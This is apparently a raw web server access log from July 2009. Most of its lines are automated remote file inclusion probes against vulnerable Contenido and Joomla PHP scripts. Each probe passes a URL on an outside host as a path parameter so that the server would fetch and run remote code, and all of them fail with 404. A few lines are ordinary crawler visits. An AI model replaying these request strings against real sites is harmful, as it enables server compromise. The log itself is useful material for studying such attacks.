196.25.27.90 - - [01/Jul/2009:07:35:58 +0000] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 336
196.25.27.90 - - [01/Jul/2009:07:35:58 +0000] "GET /logs/access_log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 347
196.25.27.90 - - [01/Jul/2009:07:35:58 +0000] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 331
196.25.27.90 - - [01/Jul/2009:07:36:09 +0000] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 331
196.25.27.90 - - [01/Jul/2009:07:36:10 +0000] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 336
196.25.27.90 - - [01/Jul/2009:07:36:12 +0000] "GET /logs/access_log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 347
202.67.153.114 - - [01/Jul/2009:07:36:15 +0000] "GET /logs/access_log%20%20///contact.php?AD_BODY_TEMP=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 308
218.38.136.16 - - [01/Jul/2009:07:37:28 +0000] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://zoulekreunion.com/images/back.png?? HTTP/1.1" 404 327
218.38.136.16 - - [01/Jul/2009:07:37:28 +0000] "GET /logs/access_log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://zoulekreunion.com/images/back.png?? HTTP/1.1" 404 338
218.38.136.16 - - [01/Jul/2009:07:37:31 +0000] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://zoulekreunion.com/images/back.png?? HTTP/1.1" 404 322
87.250.254.242 - - [01/Jul/2009:07:37:45 +0000] "GET /robots.txt HTTP/1.1" 404 287
123.242.165.138 - - [01/Jul/2009:07:39:12 +0000] "GET /logs/access_log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.sunset-travel.ro/ro/cache/devid.txt%0D?? HTTP/1.1" 404 337
123.242.165.138 - - [01/Jul/2009:07:39:18 +0000] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.sunset-travel.ro/ro/cache/devid.txt%0D?? HTTP/1.1" 404 321
196.25.27.90 - - [01/Jul/2009:07:42:06 +0000] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 331
196.25.27.90 - - [01/Jul/2009:07:42:06 +0000] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 336
196.25.27.90 - - [01/Jul/2009:07:42:06 +0000] "GET /logs/access_log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 347
196.25.27.90 - - [01/Jul/2009:07:42:07 +0000] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 331
196.25.27.90 - - [01/Jul/2009:07:42:07 +0000] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 336
196.25.27.90 - - [01/Jul/2009:07:42:07 +0000] "GET /logs/access_log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 347
216.254.103.223 - - [01/Jul/2009:07:43:18 +0000] "GET /logs/access_log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 347
216.254.103.223 - - [01/Jul/2009:07:43:23 +0000] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 331
216.254.103.223 - - [01/Jul/2009:07:43:23 +0000] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 336
151.1.154.24 - - [01/Jul/2009:07:43:42 +0000] "GET /logs/access_log%20%20///contact.php?AD_BODY_TEMP=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 308
220.231.126.252 - - [01/Jul/2009:07:43:58 +0000] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://zoulekreunion.com/images/back.png?? HTTP/1.1" 404 322
220.231.126.252 - - [01/Jul/2009:07:43:58 +0000] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://zoulekreunion.com/images/back.png?? HTTP/1.1" 404 327
220.231.126.252 - - [01/Jul/2009:07:43:58 +0000] "GET /logs/access_log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://zoulekreunion.com/images/back.png?? HTTP/1.1" 404 338
195.34.78.110 - - [01/Jul/2009:07:45:05 +0000] "GET /logs/access_log//include/lib.inc.php?site_path=http://www.acesoir.de/cache/fatal1.txt?? HTTP/1.1" 404 313
195.34.78.110 - - [01/Jul/2009:07:45:05 +0000] "GET //include/lib.inc.php?site_path=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 297
195.34.78.110 - - [01/Jul/2009:07:45:05 +0000] "GET /logs/access_log//include/lib.inc.php?site_path=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 313
195.34.78.110 - - [01/Jul/2009:07:45:05 +0000] "GET //include/lib.inc.php?site_path=http://www.acesoir.de/cache/fatal1.txt?? HTTP/1.1" 404 297
195.34.78.110 - - [01/Jul/2009:07:45:05 +0000] "GET /logs//include/lib.inc.php?site_path=http://www.acesoir.de/cache/fatal1.txt?? HTTP/1.1" 404 302
195.34.78.110 - - [01/Jul/2009:07:45:05 +0000] "GET /logs//include/lib.inc.php?site_path=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 302
114.80.93.71 - - [01/Jul/2009:07:47:13 +0000] "GET / HTTP/1.1" 200 125
196.25.27.90 - - [01/Jul/2009:07:47:27 +0000] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 331
196.25.27.90 - - [01/Jul/2009:07:47:27 +0000] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 336
196.25.27.90 - - [01/Jul/2009:07:47:27 +0000] "GET /logs/access_log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 347
216.254.103.223 - - [01/Jul/2009:07:47:37 +0000] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 331
216.254.103.223 - - [01/Jul/2009:07:47:37 +0000] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 336
216.254.103.223 - - [01/Jul/2009:07:47:37 +0000] "GET /logs/access_log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 347
131.203.76.246 - - [01/Jul/2009:07:49:04 +0000] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://boomboombooty.com/galleries/bendovervideo1/1.txt? HTTP/1.1" 404 355
131.203.76.246 - - [01/Jul/2009:07:49:06 +0000] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://boomboombooty.com/galleries/bendovervideo1/1.txt? HTTP/1.1" 404 350
131.203.76.246 - - [01/Jul/2009:07:49:06 +0000] "GET /logs/access_log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://boomboombooty.com/galleries/bendovervideo1/1.txt? HTTP/1.1" 404 366
216.254.103.223 - - [01/Jul/2009:07:51:58 +0000] "GET /logs/access_log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 349
196.25.27.90 - - [01/Jul/2009:07:52:40 +0000] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 331
196.25.27.90 - - [01/Jul/2009:07:52:40 +0000] "GET /logs/access_log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 347
196.25.27.90 - - [01/Jul/2009:07:52:41 +0000] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 336
216.254.103.223 - - [01/Jul/2009:07:54:23 +0000] "GET /logs/access_log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 349
220.231.126.252 - - [01/Jul/2009:07:54:34 +0000] "GET /logs/access_log%20%20/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://zoulekreunion.com/images/back.png?? HTTP/1.1" 404 340
196.25.27.90 - - [01/Jul/2009:07:54:44 +0000] "GET /logs/access_log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 349
69.94.56.39 - - [01/Jul/2009:07:57:02 +0000] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Bcontenido%5D=http://highlandquebec.com/Templates/id1.txt? HTTP/1.0" 404 319
69.94.56.39 - - [01/Jul/2009:07:57:02 +0000] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Bcontenido%5D=http://highlandquebec.com/Templates/id1.txt? HTTP/1.0" 404 324
69.94.56.39 - - [01/Jul/2009:07:57:02 +0000] "GET /logs/access_log//contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Bcontenido%5D=http://highlandquebec.com/Templates/id1.txt? HTTP/1.0" 404 335
196.25.27.90 - - [01/Jul/2009:07:58:33 +0000] "GET /logs/access_log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 349
196.25.27.90 - - [01/Jul/2009:07:58:36 +0000] "GET /logs/access_log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 349
69.94.56.39 - - [01/Jul/2009:07:58:49 +0000] "GET /logs/access_log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Bcontenido%5D=http://highlandquebec.com/Templates/id1.txt? HTTP/1.0" 404 337
131.203.76.246 - - [01/Jul/2009:08:00:24 +0000] "GET /logs/access_log%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://boomboombooty.com/galleries/bendovervideo1/1.txt? HTTP/1.1" 404 368
196.25.27.90 - - [01/Jul/2009:08:01:20 +0000] "GET /logs/access_log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 349
77.232.68.137 - - [01/Jul/2009:08:06:26 +0000] "GET /logs/access_log%20%20/lostpasswd.php?env[include_prefix]=http://webmail.cyber.it/forums/ecodellemissioni/idfx1.txt?? HTTP/1.1" 404 309
77.232.68.137 - - [01/Jul/2009:08:06:26 +0000] "GET /logs/lostpasswd.php?env[include_prefix]=http://webmail.cyber.it/forums/ecodellemissioni/idfx1.txt?? HTTP/1.1" 404 296
77.232.68.137 - - [01/Jul/2009:08:06:26 +0000] "GET /lostpasswd.php?env[include_prefix]=http://webmail.cyber.it/forums/ecodellemissioni/idfx1.txt?? HTTP/1.1" 404 291
77.232.68.137 - - [01/Jul/2009:08:07:58 +0000] "GET /logs/access_log%20%20/lostpasswd.php?env[include_prefix]=http://webmail.cyber.it/forums/ecodellemissioni/idfx1.txt?? HTTP/1.1" 404 309
77.232.68.137 - - [01/Jul/2009:08:07:58 +0000] "GET /logs/lostpasswd.php?env[include_prefix]=http://webmail.cyber.it/forums/ecodellemissioni/idfx1.txt?? HTTP/1.1" 404 296
77.232.68.137 - - [01/Jul/2009:08:07:58 +0000] "GET /lostpasswd.php?env[include_prefix]=http://webmail.cyber.it/forums/ecodellemissioni/idfx1.txt?? HTTP/1.1" 404 291
65.23.158.226 - - [01/Jul/2009:08:11:47 +0000] "GET /logs/access_log%20%20/administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://www.maerkischepolster.de//images/lib/idfx1.txt??? HTTP/1.1" 404 357
65.23.158.226 - - [01/Jul/2009:08:11:47 +0000] "GET /logs/administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://www.maerkischepolster.de//images/lib/idfx1.txt??? HTTP/1.1" 404 344
65.23.158.226 - - [01/Jul/2009:08:11:47 +0000] "GET /administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://www.maerkischepolster.de//images/lib/idfx1.txt??? HTTP/1.1" 404 339
65.23.158.226 - - [01/Jul/2009:08:34:41 +0000] "GET /logs/access_log/administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://www.maerkischepolster.de//images/lib/idfx1.txt??? HTTP/1.1" 404 355
124.115.1.8 - - [01/Jul/2009:08:35:51 +0000] "GET / HTTP/1.1" 200 125
77.232.68.137 - - [01/Jul/2009:08:44:21 +0000] "GET /logs/access_log/lostpasswd.php?env[include_prefix]=http://webmail.cyber.it/forums/ecodellemissioni/idfx1.txt?? HTTP/1.1" 404 307
72.14.199.85 - - [01/Jul/2009:08:45:52 +0000] "GET /feeds/posts/default HTTP/1.1" 404 296
213.238.52.141 - - [01/Jul/2009:09:06:13 +0000] "GET //components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 321
213.238.52.141 - - [01/Jul/2009:09:06:13 +0000] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 326
213.238.52.141 - - [01/Jul/2009:09:06:13 +0000] "GET /logs/access_log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 337
195.207.160.102 - - [01/Jul/2009:09:06:50 +0000] "GET //components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 321
195.207.160.102 - - [01/Jul/2009:09:06:50 +0000] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 326
195.207.160.102 - - [01/Jul/2009:09:06:50 +0000] "GET /logs/access_log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 337
195.207.160.102 - - [01/Jul/2009:09:08:08 +0000] "GET //components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 321
195.207.160.102 - - [01/Jul/2009:09:08:08 +0000] "GET /logs/access_log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 337
195.207.160.102 - - [01/Jul/2009:09:08:08 +0000] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 326
60.251.217.4 - - [01/Jul/2009:09:08:08 +0000] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 326
60.251.217.4 - - [01/Jul/2009:09:08:13 +0000] "GET //components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 321
60.251.217.4 - - [01/Jul/2009:09:08:22 +0000] "GET /logs/access_log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 337
60.251.217.4 - - [01/Jul/2009:09:09:32 +0000] "GET //components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 321
60.251.217.4 - - [01/Jul/2009:09:09:32 +0000] "GET /logs/access_log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 337
60.251.217.4 - - [01/Jul/2009:09:09:37 +0000] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 326
195.207.160.102 - - [01/Jul/2009:09:11:49 +0000] "GET /logs/access_log%20%20//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 339
195.207.160.102 - - [01/Jul/2009:09:12:11 +0000] "GET /logs/access_log%20%20//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 339
217.16.16.225 - - [01/Jul/2009:09:12:17 +0000] "GET /logs/access_log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.telso.com/data/id.txt%0D?? HTTP/1.1" 404 344
217.16.16.225 - - [01/Jul/2009:09:12:17 +0000] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.telso.com/data/id.txt%0D?? HTTP/1.1" 404 333
217.16.16.225 - - [01/Jul/2009:09:12:17 +0000] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.telso.com/data/id.txt%0D?? HTTP/1.1" 404 328
62.77.32.217 - - [01/Jul/2009:09:14:02 +0000] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 328
62.77.32.217 - - [01/Jul/2009:09:14:03 +0000] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 333
62.77.32.217 - - [01/Jul/2009:09:14:12 +0000] "GET /logs/access_log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 344
213.238.52.141 - - [01/Jul/2009:09:14:35 +0000] "GET /logs/access_log%20%20//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 339
121.165.73.157 - - [01/Jul/2009:09:15:49 +0000] "GET /logs/access_log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.telso.com/data/id.txt%0D?? HTTP/1.1" 404 344
121.165.73.157 - - [01/Jul/2009:09:15:49 +0000] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.telso.com/data/id.txt%0D?? HTTP/1.1" 404 333
121.165.73.157 - - [01/Jul/2009:09:15:49 +0000] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.telso.com/data/id.txt%0D?? HTTP/1.1" 404 328
60.251.217.4 - - [01/Jul/2009:09:16:25 +0000] "GET /logs/access_log%20%20//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 339
114.200.199.144 - - [01/Jul/2009:09:17:10 +0000] "GET /logs/access_log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kodae.ms.kr///_private/tool/id1.txt? HTTP/1.1" 404 344
114.200.199.144 - - [01/Jul/2009:09:17:10 +0000] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kodae.ms.kr///_private/tool/id1.txt? HTTP/1.1" 404 333
114.200.199.144 - - [01/Jul/2009:09:17:10 +0000] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kodae.ms.kr///_private/tool/id1.txt???? HTTP/1.1" 404 328
114.200.199.144 - - [01/Jul/2009:09:17:10 +0000] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kodae.ms.kr///_private/tool/id1.txt???? HTTP/1.1" 404 333
114.200.199.144 - - [01/Jul/2009:09:17:10 +0000] "GET /logs/access_log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kodae.ms.kr///_private/tool/id1.txt???? HTTP/1.1" 404 344
114.200.199.144 - - [01/Jul/2009:09:17:11 +0000] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kodae.ms.kr///_private/tool/id1.txt? HTTP/1.1" 404 328
60.251.217.4 - - [01/Jul/2009:09:18:14 +0000] "GET /logs/access_log%20%20//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 339
114.200.199.144 - - [01/Jul/2009:09:19:31 +0000] "GET /logs/access_log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kodae.ms.kr///_private/tool/id1.txt???? HTTP/1.1" 404 346
114.200.199.144 - - [01/Jul/2009:09:19:40 +0000] "GET /logs/access_log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kodae.ms.kr///_private/tool/id1.txt? HTTP/1.1" 404 346
202.181.243.113 - - [01/Jul/2009:09:20:00 +0000] "GET //components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://mexxs.net/images/test.gif?? HTTP/1.1" 404 321
202.181.243.113 - - [01/Jul/2009:09:20:00 +0000] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://mexxs.net/images/test.gif?? HTTP/1.1" 404 326
218.232.105.116 - - [01/Jul/2009:09:20:05 +0000] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 328
218.232.105.116 - - [01/Jul/2009:09:20:05 +0000] "GET /logs/access_log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 344
218.232.105.116 - - [01/Jul/2009:09:20:05 +0000] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 333
218.232.105.116 - - [01/Jul/2009:09:20:24 +0000] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 333
218.232.105.116 - - [01/Jul/2009:09:20:24 +0000] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 328
218.232.105.116 - - [01/Jul/2009:09:20:24 +0000] "GET /logs/access_log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 344
218.232.105.116 - - [01/Jul/2009:09:20:28 +0000] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 328
218.232.105.116 - - [01/Jul/2009:09:20:28 +0000] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 333
218.232.105.116 - - [01/Jul/2009:09:20:28 +0000] "GET /logs/access_log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 344
218.232.105.116 - - [01/Jul/2009:09:20:36 +0000] "GET /logs/access_log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 344
218.232.105.116 - - [01/Jul/2009:09:20:36 +0000] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 333
218.232.105.116 - - [01/Jul/2009:09:20:36 +0000] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 328
201.232.54.48 - - [01/Jul/2009:09:21:23 +0000] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://aciel.biz.ly/dataquw/id1.txt?? HTTP/1.1" 404 328
201.232.54.48 - - [01/Jul/2009:09:21:34 +0000] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://aciel.biz.ly/dataquw/id1.txt?? HTTP/1.1" 404 328
66.249.134.74 - - [01/Jul/2009:09:29:15 +0000] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 343
66.249.134.74 - - [01/Jul/2009:09:29:15 +0000] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 348
66.249.134.74 - - [01/Jul/2009:09:29:15 +0000] "GET /logs/access_log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 361
66.249.134.74 - - [01/Jul/2009:09:31:21 +0000] "GET /logs/access_log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 359
62.77.32.217 - - [01/Jul/2009:09:35:36 +0000] "GET /logs/access_log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 346
60.50.11.66 - - [01/Jul/2009:09:37:24 +0000] "GET //skin/zero_vote//skin/zero_vote/ask_password.php?dir=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt?? HTTP/1.1" 404 325
60.50.11.66 - - [01/Jul/2009:09:37:24 +0000] "GET /logs//skin/zero_vote//skin/zero_vote/ask_password.php?dir=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt?? HTTP/1.1" 404 330
60.50.11.66 - - [01/Jul/2009:09:37:24 +0000] "GET /logs/access_log%20%20//skin/zero_vote//skin/zero_vote/ask_password.php?dir=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt?? HTTP/1.1" 404 343
72.14.199.85 - - [01/Jul/2009:09:45:56 +0000] "GET /feeds/posts/default HTTP/1.1" 404 296
58.61.164.139 - - [01/Jul/2009:10:01:40 +0000] "GET / HTTP/1.1" 200 125
66.249.71.102 - - [01/Jul/2009:10:06:18 +0000] "GET /robots.txt HTTP/1.1" 404 287
66.249.71.102 - - [01/Jul/2009:10:06:18 +0000] "GET /webalizer/usage_200907.html HTTP/1.1" 401 480
123.125.66.59 - - [01/Jul/2009:10:06:44 +0000] "GET / HTTP/1.1" 200 125
66.249.71.104 - - [01/Jul/2009:10:07:00 +0000] "GET /robots.txt HTTP/1.1" 404 287
66.249.71.104 - - [01/Jul/2009:10:07:00 +0000] "GET /webalizer/usage_200907.html HTTP/1.1" 401 480
66.249.71.104 - - [01/Jul/2009:10:15:19 +0000] "GET /webmail/ HTTP/1.1" 302 26
66.249.71.104 - - [01/Jul/2009:10:15:19 +0000] "GET /webmail/src/login.php HTTP/1.1" 200 2107
